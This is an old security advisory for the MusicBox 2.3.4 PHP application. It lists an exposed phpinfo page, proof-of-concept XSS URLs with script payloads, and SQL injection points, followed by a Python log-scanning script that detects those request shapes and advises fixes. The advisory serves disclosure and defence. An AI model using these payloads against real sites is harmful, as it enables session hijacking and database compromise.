MusicBox <= 2.3.4 XSS and SQL Injection Vulnerabilities

2006-07-25T00:00:00
ID SECURITYVULNS:DOC:13612
Type securityvulns
Reporter Securityvulns
Modified 2006-07-25T00:00:00

Description

MusicBox 2.3.4 http://www.musicboxv2.com


Exposed phpinfo() page (information disclosure)

/phpinfo.php

Cross Site Scripting (XSS)

http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0
http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0
http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0
http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script>
http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists


SQL injection

http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL]
http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists
http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]
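As an added example (not part of the advisory), a small Python log-triage script that flags requests matching the two shapes above: HTML tags in the parameters the XSS URLs show being reflected (id, term, type, show), and non-integer values in the parameters the SQL injection URLs show taking numbers (show, start, page, aid). It assumes Apache combined log format; the log lines are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Parameter names taken from the advisory's URLs
REFLECTED_PARAMS = {"id", "term", "type", "show"}   # reflected into HTML (XSS sinks)
NUMERIC_PARAMS = {"show", "start", "page", "aid"}   # expected integers (SQL sinks)

TAG_RE = re.compile(r"<\s*/?\s*[a-z]", re.I)        # any opening/closing HTML tag
# Apache combined log line: ip ident user [ts] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def analyse_request(path):
    """Return (param, reason) findings for one request path to the MusicBox front controller."""
    findings = []
    parsed = urlparse(path)
    if parsed.path not in ("/", "/index.php"):
        return findings
    # parse_qs percent-decodes values once, so %3Cscript%3E and %60 are seen decoded
    for name, values in parse_qs(parsed.query, keep_blank_values=True).items():
        for value in values:
            if name in REFLECTED_PARAMS and TAG_RE.search(value):
                findings.append((name, "html-tag-in-reflected-param"))
            if name in NUMERIC_PARAMS and not re.fullmatch(r"\d*", value):
                findings.append((name, "non-numeric-value-in-numeric-param"))
    return findings

def scan_log(lines):
    """Return (ip, path, findings) for every parsed line with at least one finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyse_request(m["path"])
        if findings:
            hits.append((m["ip"], m["path"], findings))
    return hits

# Constructed sample log: one benign request, then probes shaped like the advisory's URLs
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Jul/2006:10:00:01 +0000] "GET /index.php?action=top&show=5&type=Artists HTTP/1.1" 200 512',
    '203.0.113.5 - - [25/Jul/2006:10:00:02 +0000] "GET /index.php?id=%3E%3Cscript%3Ealert(1)%3C/script%3E&page=0 HTTP/1.1" 200 611',
    '203.0.113.5 - - [25/Jul/2006:10:00:03 +0000] "GET /index.php?term=hit&in=song&action=search&start=%60 HTTP/1.1" 500 0',
    '203.0.113.5 - - [25/Jul/2006:10:00:04 +0000] "GET /?action=viewgallery&type=album&aid=&page=-1 HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, path, findings in scan_log(SAMPLE_LOG):
        print(ip, path, findings)
```

The check is a triage heuristic for this advisory's URL shapes, not a substitute for fixing the application (output encoding for the reflected parameters, integer casting or prepared statements for the numeric ones).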


Ellipsis Security http://www.ellsec.org